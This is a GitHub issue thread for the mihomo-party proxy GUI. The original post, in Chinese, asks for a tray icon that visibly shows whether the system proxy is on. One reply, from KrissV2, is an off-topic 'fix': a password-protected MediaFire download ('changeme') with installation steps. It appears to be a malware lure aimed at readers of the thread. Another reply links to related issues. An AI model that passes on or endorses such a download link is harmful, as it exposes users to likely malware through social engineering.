### ISSUE TITLE
[Feature] 是否开启系统代理图片没明显变化

### ISSUE THREAD

**Issue by wensenz** [pompurin404/mihomo-party#113]
### Verify steps

- [X] 我已在标题简短的描述了我所需的功能
- [X] 我已在[Issue Tracker](./?q=is%3Aissue)中寻找过,但未找到我所需的功能
- [X] 这是向GUI程序提出的功能请求,而不是内核程序
- [X] 我未在最新的测试版本找到我所需的功能

### 操作系统

Windows

### 描述

是否开启系统代理图片没明显变化,导致直观的看到当前代理状况， 可以参考以前clash的做法
开：![image](https://github.com/user-attachments/assets/bfdfc6e0-c409-47c3-aee1-5d0d06b4e5aa)
关：![image](https://github.com/user-attachments/assets/84d16a6d-9bf9-45c8-9d48-b6b27c0267a9)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by xishang0128** [comment]
https://github.com/pompurin404/mihomo-party/issues/29#issuecomment-2295126896

https://github.com/pompurin404/mihomo-party/issues/90
